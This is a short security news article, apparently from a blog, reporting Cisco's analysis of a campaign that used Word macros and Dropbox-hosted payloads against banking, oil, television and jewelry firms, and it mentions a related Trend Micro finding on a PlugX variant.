We have already seen attacks in which bad actors use the popular cloud storage, a few days ago Trend Micro analyzed a targeted attack against a Taiwanese government entity which used a variant of the PlugX RAT that abuses the Dropbox service too.
“The threat actor used the cloud-based file-sharing service offered by Dropbox to host four separate pieces of the payload for the exploit. We reported these links to the Dropbox security team who confirmed that they disabled the file share links. We believe the londonpaerl.co.uk and selombiznet.in domains act as command and control servers.” reported Cisco in a blog post.
Hackers have leveraged a consolidated technique using Visual Basic for Applications, to conduct the attack.
“In this specific example the attackers targeted a feature within Microsoft Word — Visual Basic Scripting for Applications. While basic, the Office Macro attack vector is obviously still working quite effectively. When the victim opens the Word document, an On-Open macro fires, which results in downloading an executable and launching it on the victim’s machine. This threat actor has particularly lavish tastes. This threat actor seem to target high-profile, money-rich industries such as banking, oil, television, and jewelry.” states the post.
Cisco announced that next week it will provide more information on the group responsible for the attacks, on the exploits used in the offensive, including data on the malware used by attackers and obfuscation techniques implemented.
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.